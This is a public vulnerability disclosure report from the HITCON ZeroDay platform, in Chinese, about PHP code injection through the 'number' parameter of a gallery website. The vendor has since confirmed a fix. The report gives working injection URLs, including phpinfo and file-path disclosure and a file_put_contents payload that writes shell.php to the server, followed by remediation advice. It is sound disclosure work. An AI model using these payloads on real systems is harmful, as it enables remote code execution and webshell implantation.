Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00711
- 發信 Vendor: 誠品股份有限公司
- Title: 某畫廊 php 程式碼注人
- Introduction: php 程式碼注人
處理狀態
目前狀態
公開
Last Update : 2023/02/09
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2022/09/04 10:04:28 : 新提交 (由 好男人 更新此狀態)
- 2022/09/05 10:25:55 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/05 15:51:03 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/05 15:51:03 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/30 00:44:41 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/30 00:44:41 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/30 00:44:41 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/10/03 16:27:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/11/04 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2023/02/06 11:37:51 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/02/08 09:51:38 : 確認已修補 (由 好男人 更新此狀態)
- 2023/02/09 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00711
- 通報者:qekuxpre (好男人)
- 風險:高
- 類型:程式碼執行 (Code Execution)
參考資料
攻擊者可藉由此漏洞執行惡意程式碼,進行如操縱網站作業系統等惡意行為。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.eslitegallery.com/index.php?number=1&post_type=product&s=1
敘述
在number參數後嘗試注人php 程式碼,print(HITCONZERODAY好男人)
https://www.eslitegallery.com/index.php?number=%24{%40print(HITCONZERODAY好男人))}&post_type=product&s=1顯示phpinfo
https://www.eslitegallery.com/index.php?number=%24{%40phpinfo()}&post_type=product&s=1顯示網頁當前目錄
https://www.eslitegallery.com/index.php?number=%24{%40print(__FILE__)}&post_type=product&s=1利用POST上傳含有"phpinfo()"網頁
https://www.eslitegallery.com/index.php?number=%24{%40var_dump(file_put_contents($_POST[1],$_POST[2]))}&post_type=product&s=1
POST data:1=shell.php&2=<?php phpinfo()?>成功顯示phpinfo
https://www.eslitegallery.com/goodmanphpinfo.php惡意用戶可能會利用此漏洞執行惡意程式碼或上傳webshell進行後續滲透行為
修補建議
1.盡量不要使用eval等函數
2.如果使用的話一定要進行嚴格的過濾
3.preg_replace放棄使用/e修飾符
4.禁用函數,修改配置文件php.ini裡的disable functions = 要禁用的函數
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。